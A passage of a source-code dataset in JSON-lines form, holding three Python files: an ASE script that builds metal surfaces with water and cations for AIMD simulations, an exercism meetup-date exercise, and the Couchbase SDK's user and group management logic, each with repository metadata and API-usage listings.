70, "usage_type": "call"}, {"api_name": "os.path.path.join", "line_number": 103, "usage_type": "call"}, {"api_name": "os.path.path", "line_number": 103, "usage_type": "attribute"}, {"api_name": "os.path", "line_number": 103, "usage_type": "name"}, {"api_name": "element_generator.GenerateElements", "line_number": 113, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 125, "usage_type": "call"}, {"api_name": "json_comment_eater.Nom", "line_number": 125, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 146, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 146, "usage_type": "name"}, {"api_name": "optparse.OptionParser", "line_number": 152, "usage_type": "call"}, {"api_name": "os.path.path.normpath", "line_number": 169, "usage_type": "call"}, {"api_name": "os.path.path", "line_number": 169, "usage_type": "attribute"}, {"api_name": "os.path", "line_number": 169, "usage_type": "name"}, {"api_name": "os.path.path.splitext", "line_number": 170, "usage_type": "call"}, {"api_name": "os.path.path", "line_number": 170, "usage_type": "attribute"}, 
{"api_name": "os.path", "line_number": 170, "usage_type": "name"}, {"api_name": "os.path.path.split", "line_number": 171, "usage_type": "call"}, {"api_name": "os.path.path", "line_number": 171, "usage_type": "attribute"}, {"api_name": "os.path", "line_number": 171, "usage_type": "name"}, {"api_name": "os.path.path.join", "line_number": 173, "usage_type": "call"}, {"api_name": "os.path.path", "line_number": 173, "usage_type": "attribute"}, {"api_name": "os.path", "line_number": 173, "usage_type": "name"}, {"api_name": "os.path.path.normpath", "line_number": 173, "usage_type": "call"}, {"api_name": "os.path.path.normpath", "line_number": 178, "usage_type": "call"}, {"api_name": "os.path.path", "line_number": 178, "usage_type": "attribute"}, {"api_name": "os.path", "line_number": 178, "usage_type": "name"}]} +{"seq_id": "18729755750", "text": "\"\"\"Create structures that have random positions of the cation in an AIMD calculation.\"\"\"\n\nimport os\nimport sys\nimport numpy as np\nimport yaml\nfrom dataclasses import dataclass\nfrom ase import atom, build\nfrom ase import constraints\nfrom ase import Atoms\nfrom ase import data\nfrom pathlib import Path\nfrom copy import deepcopy\n\ndef get_random_xy_positions(cell, n_atoms):\n \"\"\"Get random xy positions for the cation.\"\"\"\n x_chosen = np.random.uniform(0, np.linalg.norm(cell[0]), n_atoms)\n y_chosen = np.random.uniform(0, np.linalg.norm(cell[1]), n_atoms)\n return x_chosen, y_chosen\n\ndef check_xy_distance(test_atoms, cutoff_fraction):\n \"\"\"Check if the xy positions are too close to each other.\"\"\"\n for i in range(len(test_atoms)):\n for j in range(i+1, len(test_atoms)):\n # required minimum distance is the sum of the covalent radii\n min_cutoff = data.covalent_radii[data.atomic_numbers[test_atoms[i].symbol]] + \\\n data.covalent_radii[data.atomic_numbers[test_atoms[j].symbol]]\n # Reduce the min cutoff by the cutoff fraction\n min_cutoff = min_cutoff * cutoff_fraction\n # if np.linalg.norm(test_atoms.get_positions()[i] - test_atoms.get_positions()[j]) < min_cutoff:\n if test_atoms.get_distance(i,j, mic=True) < min_cutoff:\n return False\n return True\n\ndef add_natoms_to_surface(surface, n_atoms, atoms_all, x_chosen, y_chosen, z_chosen):\n \"\"\"For a given number of atoms, and Atoms extend the original atoms object\"\"\"\n for j, n_atom in enumerate(range(n_atoms)):\n atoms_to_extend = atoms_all[j]\n # Standardize the positions\n atoms_to_extend.set_cell([1, 1, 1])\n atoms_to_extend.center()\n atoms_to_extend.set_cell([0, 0, 0])\n atoms_to_extend.rotate('y', np.random.uniform(0, 360), center='COU')\n atoms_to_extend.translate([[x_chosen[j], y_chosen[j], z_chosen]])\n\n # Rotate the molecule randomly\n surface.extend(atoms_to_extend)\n\n@dataclass\nclass CreateCation:\n \"\"\"Create structures with cations within a cell of given dimensions.\"\"\"\n yaml_file: str\n\n def __post_init__(self):\n \"\"\"Initialize class.\"\"\"\n self.yaml_file = os.path.abspath(self.yaml_file)\n # Check if all of the tags are available, and if there\n # is more or less it raises and exception.\n inputs = yaml.safe_load(open(self.yaml_file))\n\n # get the facet\n self.facet = inputs['facet']\n # get the metal atom\n self.metal_name = inputs['metal_name']\n # get the lattice constants\n self.a = inputs['a']\n # Metal layers\n self.metal_layers = int(inputs['metal_layers'])\n # get the cation\n self.cation = inputs['cation']\n # get the layer that the cation must be in \n self.layer_of_cation = inputs['layer_of_cation']\n # get the dimensions of the 
bulk structure\n self.dimensions = inputs['dimensions']\n # get the number of water layers\n self.water_layers = inputs['water_layers']\n # get the number of water atoms per water layer\n self.water_per_layer = inputs['water_per_layer']\n # get the distance between water layers\n self.water_layer_distance = inputs['water_layer_distance']\n # Vacuum based on the slab, important for the dipole correction\n self.vacuum = inputs['vacuum']\n # Choose a cutoff fraction to be lowered from the sum of the covalent radii\n self.cutoff_fraction = inputs['cutoff_fraction']\n\n # Check if an adsorbate is supplied\n self.adsorbate = inputs.pop('adsorbate', '')\n\n self.create_surface()\n if self.adsorbate:\n self.add_adsorbate_to_surface()\n self.create_water_and_cation()\n self.create_pre_relaxation_structures()\n\n def create_surface(self):\n \"\"\"Create the surface and fix half the layers.\"\"\"\n # create the bulk structure\n bulk = build.bulk(self.metal_name, 'fcc', a=self.a, cubic=True)\n\n # create the surface\n miller_indices = [int(a) for a in self.facet]\n surface = build.surface(bulk, indices=miller_indices, layers=self.metal_layers)\n\n # Repeat the structure\n self.dimensions = [int(a) for a in self.dimensions]\n surface.center(vacuum=self.vacuum, axis=2)\n surface = surface.repeat([self.dimensions[0], self.dimensions[1], 1])\n\n # fix the bottom half of the surface\n all_z_index = surface.get_positions()[:, 2]\n all_index = np.arange(len(all_z_index))\n mean_z_index = np.mean(all_z_index)\n bottom_z_index = all_index[all_z_index < mean_z_index]\n\n # Set the tag to 1 for things that we want to fix\n for index_fixed in bottom_z_index:\n surface[index_fixed].tag = 1\n\n # Store the position of the topmost metal atom \n self.top_metal_atom = all_index[np.argmax(all_z_index)]\n\n # Move the surface to the bottom of the cell\n surface.translate([[0, 0, -np.min(all_z_index)]])\n\n # store the surface\n self.surface = surface\n self._store_highest_positons()\n\n def constrain_atoms(self):\n \"\"\"Fix all atoms with a tag of 1\"\"\"\n fix_index = [ a for a in range(len(self.surface)) if self.surface[a].tag == 1]\n # create the constraint\n constraint = constraints.FixAtoms(indices=fix_index)\n # add the constraint to the surface\n self.surface.set_constraint(constraint)\n\n def add_adsorbate_to_surface(self):\n \"\"\"If an adsorbate is provided, add it to the surface.\"\"\"\n if self.adsorbate == 'CO2':\n co2_positions = [\n [0.00042955, 10.69278681, 10.02427761 ],\n [0.03581859, 9.53396647, 10.43134496 ],\n [-0.0347786, 11.85195424, 10.43097203 ],\n ]\n co2 = Atoms('CO2', positions=co2_positions)\n height = data.covalent_radii[data.atomic_numbers[self.metal_name]] + 0.75\n # get the position of the topmost metal atom\n position = self.surface.get_positions()[self.top_metal_atom]\n build.add_adsorbate(self.surface, co2, height=height, position = position[0:2])\n for i in range(4):\n self.surface[-i].tag = 1\n\n def _store_highest_positons(self):\n z_min = self.surface.get_positions()[:, 2].max()\n z_min += data.covalent_radii[data.atomic_numbers[self.metal_name]]\n z_min += self.water_layer_distance\n self.z_min = z_min\n print(f'Lowest possible water structure at z-coordinate {z_min} AA')\n\n def create_water_and_cation(self):\n \"\"\"Create water and cation structures that are put on top of the metal surfaces.\"\"\"\n\n # Create the water and cation atoms objects\n water = build.molecule('H2O')\n cation = Atoms(self.cation)\n\n z_min = self.z_min\n\n # Decide on the z-coordinate of the water 
positions\n for i, layer in enumerate(np.arange(1, self.water_layers+1, 1)):\n # Find the number of atoms placed in a layer\n n_atoms = self.water_per_layer\n if self.layer_of_cation == layer:\n atoms_all = [deepcopy(water) for n_atom in range(n_atoms-1)]\n atoms_all += [cation]\n else:\n atoms_all = [deepcopy(water) for n_atom in range(n_atoms)]\n\n # Decide on the z-coordinate of the water\n z_chosen = z_min + i * self.water_layer_distance\n x_chosen, y_chosen = get_random_xy_positions(self.surface.cell, n_atoms)\n\n # Create a copy of the atoms object to test if the xy positions are too close\n test_atoms = deepcopy(self.surface)\n\n # Add the atoms to the test_atoms\n add_natoms_to_surface(test_atoms, n_atoms, atoms_all, x_chosen, y_chosen, z_chosen)\n\n # Check if the xy positions are too close\n iteration = 0\n while not check_xy_distance(test_atoms, cutoff_fraction = self.cutoff_fraction):\n # The atoms are too close to each other, change the angles\n iteration += 1\n print(f'Iteration {iteration}')\n # Try again, with a changed angle\n test_atoms = deepcopy(self.surface)\n add_natoms_to_surface(test_atoms, n_atoms, atoms_all, x_chosen, y_chosen, z_chosen)\n if iteration > 100:\n # Create a new set of atoms\n test_atoms = deepcopy(self.surface)\n x_chosen, y_chosen = get_random_xy_positions(self.surface.cell, n_atoms)\n add_natoms_to_surface(test_atoms, n_atoms, atoms_all, x_chosen, y_chosen, z_chosen)\n if iteration > 200:\n # Give up\n raise Exception('Too many iterations')\n\n print(f'Chosen z-positions {z_chosen} AA')\n self.surface = test_atoms\n\n def create_pre_relaxation_structures(self):\n \"\"\"Create folder structure\"\"\"\n self.constrain_atoms()\n index = 1\n no_water = self.water_layers * self.water_per_layer - 1\n if self.adsorbate:\n self.metal_name = self.metal_name + '_' + self.adsorbate\n state_info = self.metal_name + '_' + self.facet + '_' + self.cation + '_' + str(self.dimensions[0]) + 'x' + str(self.dimensions[1]) + '_' + 'cationlayer_' + str(self.layer_of_cation) + '_' + str(no_water) + 'w_' + str(index)\n\n while os.path.exists(state_info):\n index += 1\n state_info = self.metal_name + '_' + self.facet + '_' + self.cation + '_' + str(self.dimensions[0]) + 'x' + str(self.dimensions[1]) + '_' + 'cationlayer_' + str(self.layer_of_cation) + '_' + str(no_water) + 'w_' + str(index)\n\n folder = os.path.join(os.getcwd(), state_info, 'pre_relaxation')\n Path(folder).mkdir(parents=True, exist_ok=True)\n self.folder = folder\n\n # Write the atoms object to that folder\n self.surface.set_pbc([True, True, True])\n self.surface.write(os.path.join(self.folder, 'pre_relaxation.traj'),)", "repo_name": "tjunewson/dipole-aimd", "sub_path": "dipole_aimd/calculation/create_cation.py", "file_name": "create_cation.py", "file_ext": "py", "file_size_in_byte": 10142, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "52", "api": [{"api_name": "numpy.random.uniform", "line_number": 17, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 17, "usage_type": "attribute"}, {"api_name": "numpy.linalg.norm", "line_number": 17, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 17, "usage_type": "attribute"}, {"api_name": "numpy.random.uniform", "line_number": 18, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 18, "usage_type": "attribute"}, {"api_name": "numpy.linalg.norm", "line_number": 18, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 18, "usage_type": 
"attribute"}, {"api_name": "ase.data.covalent_radii", "line_number": 26, "usage_type": "attribute"}, {"api_name": "ase.data", "line_number": 26, "usage_type": "name"}, {"api_name": "ase.data.atomic_numbers", "line_number": 26, "usage_type": "attribute"}, {"api_name": "ase.data.covalent_radii", "line_number": 27, "usage_type": "attribute"}, {"api_name": "ase.data", "line_number": 27, "usage_type": "name"}, {"api_name": "ase.data.atomic_numbers", "line_number": 27, "usage_type": "attribute"}, {"api_name": "numpy.random.uniform", "line_number": 43, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 43, "usage_type": "attribute"}, {"api_name": "os.path.abspath", "line_number": 56, "usage_type": "call"}, {"api_name": "os.path", "line_number": 56, "usage_type": "attribute"}, {"api_name": "yaml.safe_load", "line_number": 59, "usage_type": "call"}, {"api_name": "ase.build.bulk", "line_number": 98, "usage_type": "call"}, {"api_name": "ase.build", "line_number": 98, "usage_type": "name"}, {"api_name": "ase.build.surface", "line_number": 102, "usage_type": "call"}, {"api_name": "ase.build", "line_number": 102, "usage_type": "name"}, {"api_name": "numpy.arange", "line_number": 111, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 112, "usage_type": "call"}, {"api_name": "numpy.argmax", "line_number": 120, "usage_type": "call"}, {"api_name": "numpy.min", "line_number": 123, "usage_type": "call"}, {"api_name": "ase.constraints.FixAtoms", "line_number": 133, "usage_type": "call"}, {"api_name": "ase.constraints", "line_number": 133, "usage_type": "name"}, {"api_name": "ase.Atoms", "line_number": 145, "usage_type": "call"}, {"api_name": "ase.data.covalent_radii", "line_number": 146, "usage_type": "attribute"}, {"api_name": "ase.data", "line_number": 146, "usage_type": "name"}, {"api_name": "ase.data.atomic_numbers", "line_number": 146, "usage_type": "attribute"}, {"api_name": "ase.build.add_adsorbate", "line_number": 149, "usage_type": "call"}, {"api_name": "ase.build", "line_number": 149, "usage_type": "name"}, {"api_name": "ase.data.covalent_radii", "line_number": 155, "usage_type": "attribute"}, {"api_name": "ase.data", "line_number": 155, "usage_type": "name"}, {"api_name": "ase.data.atomic_numbers", "line_number": 155, "usage_type": "attribute"}, {"api_name": "ase.build.molecule", "line_number": 164, "usage_type": "call"}, {"api_name": "ase.build", "line_number": 164, "usage_type": "name"}, {"api_name": "ase.Atoms", "line_number": 165, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 170, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 174, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 177, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 184, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 196, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 200, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 219, "usage_type": "call"}, {"api_name": "os.path", "line_number": 219, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 223, "usage_type": "call"}, {"api_name": "os.path", "line_number": 223, "usage_type": "attribute"}, {"api_name": "os.getcwd", "line_number": 223, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 224, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 229, "usage_type": "call"}, {"api_name": "os.path", "line_number": 229, "usage_type": "attribute"}, {"api_name": 
"dataclasses.dataclass", "line_number": 49, "usage_type": "name"}]} +{"seq_id": "74716995045", "text": "from datetime import datetime, timedelta\nimport re\n\n\nclass MeetupDayException(Exception):\n pass\n\n\ndef meetup_day(year, month, weekday, named):\n count = re.sub(r'[^0-9]', '', named)\n return_date = None\n date = datetime(year, month, 1).date()\n dateinc = 0\n while date.month == month and date.year == year:\n if date.strftime('%A').lower() == weekday.lower() and date.month == month:\n dateinc += 1\n if named == 'teenth':\n if 13 <= date.day <= 19:\n return_date = date\n elif named == 'last':\n return_date = date\n elif count:\n if dateinc == int(count):\n return_date = date\n date = date + timedelta(days=1)\n if not return_date:\n raise MeetupDayException('Meetup day not found')\n return return_date\n", "repo_name": "davidejones/exercism", "sub_path": "python/meetup/meetup.py", "file_name": "meetup.py", "file_ext": "py", "file_size_in_byte": 862, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "re.sub", "line_number": 10, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 12, "usage_type": "call"}, {"api_name": "datetime.timedelta", "line_number": 25, "usage_type": "call"}]} +{"seq_id": "72895439846", "text": "from __future__ import annotations\n\nfrom copy import deepcopy\nfrom datetime import datetime\nfrom typing import (TYPE_CHECKING,\n Any,\n Dict,\n Iterable,\n List,\n Optional,\n Set,\n Union)\n\nfrom couchbase.auth import AuthDomain\nfrom couchbase.exceptions import (FeatureUnavailableException,\n GroupNotFoundException,\n InvalidArgumentException,\n RateLimitedException,\n UserNotFoundException)\nfrom couchbase.options import forward_args\nfrom couchbase.pycbc_core import (management_operation,\n mgmt_operations,\n user_mgmt_operations)\n\nif TYPE_CHECKING:\n from couchbase.management.options import (ChangePasswordOptions,\n DropGroupOptions,\n DropUserOptions,\n GetAllGroupsOptions,\n GetAllUsersOptions,\n GetGroupOptions,\n GetRolesOptions,\n GetUserOptions,\n UpsertGroupOptions,\n UpsertUserOptions)\n\n\nclass UserManagerLogic:\n\n _ERROR_MAPPING = {r'Unknown group.*': GroupNotFoundException,\n r'Unknown user.*': UserNotFoundException,\n r'Not found.*': FeatureUnavailableException,\n r'Method Not Allowed.*': FeatureUnavailableException,\n r'.*Limit\\(s\\) exceeded\\s+\\[.*\\].*': RateLimitedException}\n\n def __init__(self, connection):\n self._connection = connection\n\n def _get_valid_domain(self, auth_domain # type: Union[AuthDomain,str]\n ) -> str:\n if isinstance(auth_domain, str) and auth_domain in [\n \"local\", \"external\"]:\n return auth_domain\n elif isinstance(auth_domain, AuthDomain):\n return AuthDomain.to_str(auth_domain)\n else:\n raise InvalidArgumentException(message=\"Unknown Authentication Domain\")\n\n def get_user(self,\n username, # type: str\n *options, # type: GetUserOptions\n **kwargs # type: Any\n ) -> Optional[UserAndMetadata]:\n\n final_args = forward_args(kwargs, *options)\n domain = final_args.pop(\"domain_name\", \"local\")\n\n domain = self._get_valid_domain(domain)\n\n op_args = {\n \"domain\": domain,\n \"username\": username\n }\n\n mgmt_kwargs = {\n \"conn\": self._connection,\n \"mgmt_op\": mgmt_operations.USER.value,\n \"op_type\": user_mgmt_operations.GET_USER.value,\n \"op_args\": op_args\n }\n\n callback = kwargs.pop('callback', None)\n if callback:\n mgmt_kwargs['callback'] = callback\n\n errback = kwargs.pop('errback', 
None)\n if errback:\n mgmt_kwargs['errback'] = errback\n\n if final_args.get(\"timeout\", None) is not None:\n mgmt_kwargs[\"timeout\"] = final_args.get(\"timeout\")\n\n return management_operation(**mgmt_kwargs)\n\n def get_all_users(self,\n *options, # type: GetAllUsersOptions\n **kwargs # type: Any\n ) -> Optional[Iterable[UserAndMetadata]]:\n final_args = forward_args(kwargs, *options)\n domain = final_args.pop(\"domain_name\", \"local\")\n domain = self._get_valid_domain(domain)\n\n op_args = {\n \"domain\": domain\n }\n\n mgmt_kwargs = {\n \"conn\": self._connection,\n \"mgmt_op\": mgmt_operations.USER.value,\n \"op_type\": user_mgmt_operations.GET_ALL_USERS.value,\n \"op_args\": op_args\n }\n\n callback = kwargs.pop('callback', None)\n if callback:\n mgmt_kwargs['callback'] = callback\n\n errback = kwargs.pop('errback', None)\n if errback:\n mgmt_kwargs['errback'] = errback\n\n if final_args.get(\"timeout\", None) is not None:\n mgmt_kwargs[\"timeout\"] = final_args.get(\"timeout\")\n\n return management_operation(**mgmt_kwargs)\n\n def upsert_user(self,\n user, # type: User\n *options, # type: UpsertUserOptions\n **kwargs # type: Any\n ) -> None:\n\n final_args = forward_args(kwargs, *options)\n domain = final_args.pop(\"domain_name\", \"local\")\n domain = self._get_valid_domain(domain)\n\n if not user.groups and (not user.roles or not isinstance(user.roles, set)):\n raise InvalidArgumentException(\"Roles must be a non-empty list\")\n\n user_dict = {k: v for k, v in user.as_dict().items() if k in {\n \"password\", \"name\", \"username\", \"groups\"}}\n\n if user_dict[\"password\"] and domain == \"external\":\n raise InvalidArgumentException(\n \"External domains must not have passwords\")\n\n if user.roles:\n user_dict[\"roles\"] = list(map(lambda r: r.as_dict(), user.roles))\n\n op_args = {\n \"domain\": domain,\n \"user\": user_dict\n }\n\n mgmt_kwargs = {\n \"conn\": self._connection,\n \"mgmt_op\": mgmt_operations.USER.value,\n \"op_type\": user_mgmt_operations.UPSERT_USER.value,\n \"op_args\": op_args\n }\n\n callback = kwargs.pop('callback', None)\n if callback:\n mgmt_kwargs['callback'] = callback\n\n errback = kwargs.pop('errback', None)\n if errback:\n mgmt_kwargs['errback'] = errback\n\n if final_args.get(\"timeout\", None) is not None:\n mgmt_kwargs[\"timeout\"] = final_args.get(\"timeout\")\n\n return management_operation(**mgmt_kwargs)\n\n def drop_user(self,\n username, # type: str\n *options, # type: DropUserOptions\n **kwargs # type: Any\n ) -> None:\n\n final_args = forward_args(kwargs, *options)\n domain = final_args.pop(\"domain_name\", \"local\")\n domain = self._get_valid_domain(domain)\n\n op_args = {\n \"domain\": domain,\n \"username\": username\n }\n\n mgmt_kwargs = {\n \"conn\": self._connection,\n \"mgmt_op\": mgmt_operations.USER.value,\n \"op_type\": user_mgmt_operations.DROP_USER.value,\n \"op_args\": op_args\n }\n\n callback = kwargs.pop('callback', None)\n if callback:\n mgmt_kwargs['callback'] = callback\n\n errback = kwargs.pop('errback', None)\n if errback:\n mgmt_kwargs['errback'] = errback\n\n if final_args.get(\"timeout\", None) is not None:\n mgmt_kwargs[\"timeout\"] = final_args.get(\"timeout\")\n\n return management_operation(**mgmt_kwargs)\n\n def change_password(self,\n new_password, # type: str\n *options, # type: ChangePasswordOptions\n **kwargs # type: Any\n ) -> None:\n\n final_args = forward_args(kwargs, *options)\n\n op_args = {\n \"password\": new_password\n }\n\n mgmt_kwargs = {\n \"conn\": self._connection,\n \"mgmt_op\": 
mgmt_operations.USER.value,\n \"op_type\": user_mgmt_operations.CHANGE_PASSWORD.value,\n \"op_args\": op_args\n }\n\n callback = kwargs.pop('callback', None)\n if callback:\n mgmt_kwargs['callback'] = callback\n\n errback = kwargs.pop('errback', None)\n if errback:\n mgmt_kwargs['errback'] = errback\n\n if final_args.get(\"timeout\", None) is not None:\n mgmt_kwargs[\"timeout\"] = final_args.get(\"timeout\")\n\n return management_operation(**mgmt_kwargs)\n\n def get_roles(self,\n *options, # type: GetRolesOptions\n **kwargs # type: Any\n ) -> Optional[Iterable[RoleAndDescription]]:\n\n mgmt_kwargs = {\n \"conn\": self._connection,\n \"mgmt_op\": mgmt_operations.USER.value,\n \"op_type\": user_mgmt_operations.GET_ROLES.value\n }\n callback = kwargs.pop('callback', None)\n if callback:\n mgmt_kwargs['callback'] = callback\n\n errback = kwargs.pop('errback', None)\n if errback:\n mgmt_kwargs['errback'] = errback\n\n final_args = forward_args(kwargs, *options)\n if final_args.get(\"timeout\", None) is not None:\n mgmt_kwargs[\"timeout\"] = final_args.get(\"timeout\")\n\n return management_operation(**mgmt_kwargs)\n\n def get_group(self,\n group_name, # type: str\n *options, # type: GetGroupOptions\n **kwargs # type: Any\n ) -> Optional[Group]:\n\n op_args = {\n \"name\": group_name\n }\n\n mgmt_kwargs = {\n \"conn\": self._connection,\n \"mgmt_op\": mgmt_operations.USER.value,\n \"op_type\": user_mgmt_operations.GET_GROUP.value,\n \"op_args\": op_args\n }\n\n callback = kwargs.pop('callback', None)\n if callback:\n mgmt_kwargs['callback'] = callback\n\n errback = kwargs.pop('errback', None)\n if errback:\n mgmt_kwargs['errback'] = errback\n\n final_args = forward_args(kwargs, *options)\n if final_args.get(\"timeout\", None) is not None:\n mgmt_kwargs[\"timeout\"] = final_args.get(\"timeout\")\n\n return management_operation(**mgmt_kwargs)\n\n def get_all_groups(self,\n *options, # type: GetAllGroupsOptions\n **kwargs # type: Any\n ) -> Optional[Iterable[Group]]:\n\n mgmt_kwargs = {\n \"conn\": self._connection,\n \"mgmt_op\": mgmt_operations.USER.value,\n \"op_type\": user_mgmt_operations.GET_ALL_GROUPS.value\n }\n\n callback = kwargs.pop('callback', None)\n if callback:\n mgmt_kwargs['callback'] = callback\n\n errback = kwargs.pop('errback', None)\n if errback:\n mgmt_kwargs['errback'] = errback\n\n final_args = forward_args(kwargs, *options)\n if final_args.get(\"timeout\", None) is not None:\n mgmt_kwargs[\"timeout\"] = final_args.get(\"timeout\")\n\n return management_operation(**mgmt_kwargs)\n\n def upsert_group(self,\n group, # type: Group\n *options, # type: UpsertGroupOptions\n **kwargs # type: Any\n ) -> None:\n\n group_dict = {k: v for k, v in group.as_dict().items() if k in {\n \"name\", \"description\", \"ldap_group_reference\"}}\n\n if group.roles:\n group_dict[\"roles\"] = list(map(lambda r: r.as_dict(), group.roles))\n\n op_args = {\n \"group\": group_dict\n }\n\n mgmt_kwargs = {\n \"conn\": self._connection,\n \"mgmt_op\": mgmt_operations.USER.value,\n \"op_type\": user_mgmt_operations.UPSERT_GROUP.value,\n \"op_args\": op_args\n }\n\n callback = kwargs.pop('callback', None)\n if callback:\n mgmt_kwargs['callback'] = callback\n\n errback = kwargs.pop('errback', None)\n if errback:\n mgmt_kwargs['errback'] = errback\n\n final_args = forward_args(kwargs, *options)\n if final_args.get(\"timeout\", None) is not None:\n mgmt_kwargs[\"timeout\"] = final_args.get(\"timeout\")\n\n return management_operation(**mgmt_kwargs)\n\n def drop_group(self,\n group_name, # type: str\n *options, 
# type: DropGroupOptions\n **kwargs # type: Any\n ) -> None:\n\n op_args = {\n \"name\": group_name\n }\n\n mgmt_kwargs = {\n \"conn\": self._connection,\n \"mgmt_op\": mgmt_operations.USER.value,\n \"op_type\": user_mgmt_operations.DROP_GROUP.value,\n \"op_args\": op_args\n }\n\n callback = kwargs.pop('callback', None)\n if callback:\n mgmt_kwargs['callback'] = callback\n\n errback = kwargs.pop('errback', None)\n if errback:\n mgmt_kwargs['errback'] = errback\n\n final_args = forward_args(kwargs, *options)\n if final_args.get(\"timeout\", None) is not None:\n mgmt_kwargs[\"timeout\"] = final_args.get(\"timeout\")\n\n return management_operation(**mgmt_kwargs)\n\n\nclass UserManagementUtils(object):\n \"\"\"\n ** INTERNAL **\n \"\"\"\n\n @classmethod\n def to_set(cls, value, valid_type, display_name):\n\n if not value:\n return value\n elif isinstance(value, set):\n cls.validate_all_set_types(value, valid_type, display_name)\n return value\n elif isinstance(value, list):\n cls.validate_all_set_types(value, valid_type, display_name)\n return set(value)\n elif isinstance(value, tuple):\n cls.validate_all_set_types(value, valid_type, display_name)\n return set(value)\n elif isinstance(value, valid_type):\n return set([value])\n else:\n raise InvalidArgumentException(\n '{} must be of type {}.'.format(display_name,\n valid_type.__name__))\n\n @classmethod\n def validate_all_set_types(cls, value, valid_type, display_name):\n\n # raise if any element is not an instance of the expected type\n if not all(map(lambda r: isinstance(r, valid_type), value)):\n raise InvalidArgumentException(\n '{} must contain only objects of type {}.'.format(display_name,\n valid_type.__name__))\n\n\nclass Role:\n\n def __init__(self,\n name=None, # type: str\n bucket=None, # type: str\n scope=None, # type: str\n collection=None, # type: str\n ):\n\n if not name:\n raise InvalidArgumentException('A role must have a name')\n\n self._name = name\n self._bucket = bucket\n self._scope = scope\n self._collection = collection\n\n @property\n def name(self) -> str:\n return self._name\n\n @property\n def bucket(self) -> str:\n return self._bucket\n\n @property\n def scope(self) -> str:\n return self._scope\n\n @property\n def collection(self) -> str:\n return self._collection\n\n def as_dict(self):\n return {\n 'name': self._name,\n 'bucket': self._bucket,\n 'scope': self._scope,\n 'collection': self._collection\n }\n\n def __eq__(self, other):\n if not isinstance(other, Role):\n return False\n return (self.name == other.name\n and self.bucket == other.bucket\n and self.scope == other.scope\n and self.collection == other.collection)\n\n def __hash__(self):\n return hash((self.name, self.bucket, self.scope, self.collection))\n\n @classmethod\n def create_role(cls, raw_data):\n return cls(\n name=raw_data.get(\"name\", None),\n bucket=raw_data.get(\"bucket_name\", None),\n scope=raw_data.get(\"scope_name\", None),\n collection=raw_data.get(\"collection_name\", None)\n )\n\n\nclass RoleAndDescription:\n\n def __init__(self,\n role=None, # type: Role\n display_name=None, # type: str\n description=None, # type: str\n ce=None, # type: bool\n ):\n\n self._role = role\n self._display_name = display_name\n self._description = description\n self._ce = ce\n\n @property\n def role(self) -> Role:\n return self._role\n\n @property\n def display_name(self) -> str:\n return self._display_name\n\n @property\n def description(self) -> str:\n return self._description\n\n @property\n def ce(self) -> bool:\n return self._ce\n\n @classmethod\n def create_role_and_description(cls, raw_data):\n return cls(\n
role=Role.create_role(raw_data),\n display_name=raw_data.get('display_name', None),\n description=raw_data.get('description', None),\n ce=raw_data.get('ce', None)\n )\n\n\nclass Origin:\n \"\"\"\n Indicates why the user has a specific role.\n If the type is \"user\" it means the role is assigned\n directly to the user. If the type is \"group\" it means\n the role is inherited from the group identified by\n the \"name\" field.\n \"\"\"\n\n def __init__(self,\n type=None, # type: str\n name=None # type: str\n ):\n\n self._type = type\n self._name = name\n\n @property\n def type(self) -> str:\n return self._type\n\n @property\n def name(self) -> str:\n return self._name\n\n\nclass RoleAndOrigins:\n\n def __init__(self,\n role=None, # type: Role\n origins=[] # type: List[Origin]\n ):\n\n self._role = role\n self._origins = origins\n\n @property\n def role(self) -> Role:\n return self._role\n\n @property\n def origins(self) -> List[Origin]:\n return self._origins\n\n @classmethod\n def create_role_and_origins(cls, raw_data):\n\n # RBAC prior to v6.5 does not have origins\n origin_data = raw_data.get(\"origins\", None)\n\n return cls(\n role=Role.create_role(raw_data.get(\"role\")),\n origins=list(map(lambda o: Origin(**o), origin_data))\n if origin_data else []\n )\n\n\nclass User:\n\n def __init__(self,\n username=None, # type: str\n display_name=None, # type: str\n groups=None, # type: Set[str]\n roles=None, # type: Set[Role]\n password=None # type: str\n ):\n\n if not username:\n raise InvalidArgumentException('A user must have a username')\n\n self._username = username\n self._display_name = display_name\n self._groups = UserManagementUtils.to_set(groups, str, 'Groups')\n self._roles = UserManagementUtils.to_set(roles, Role, 'Roles')\n self._password = password\n\n @property\n def username(self) -> str:\n return self._username\n\n @property\n def display_name(self) -> str:\n return self._display_name\n\n @display_name.setter\n def display_name(self,\n value # type: str\n ):\n self._display_name = value\n\n @property\n def groups(self) -> Set[str]:\n \"\"\"names of the groups\"\"\"\n return self._groups\n\n @groups.setter\n def groups(self,\n value # type: Set[str]\n ):\n self._groups = UserManagementUtils.to_set(value, str, 'Groups')\n\n @property\n def roles(self) -> Set[Role]:\n \"\"\"only roles assigned directly to the user (not inherited from groups)\"\"\"\n return self._roles\n\n @roles.setter\n def roles(self,\n value # type: Set[Role]\n ):\n self._roles = UserManagementUtils.to_set(value, Role, 'Roles')\n\n def password(self, value):\n self._password = value\n\n password = property(None, password)\n\n def as_dict(self):\n output = {\n \"username\": self.username,\n \"name\": self.display_name,\n \"password\": self._password\n }\n\n if self.roles:\n output[\"roles\"] = list(self.roles)\n\n if self.groups:\n output[\"groups\"] = list(self.groups)\n\n return 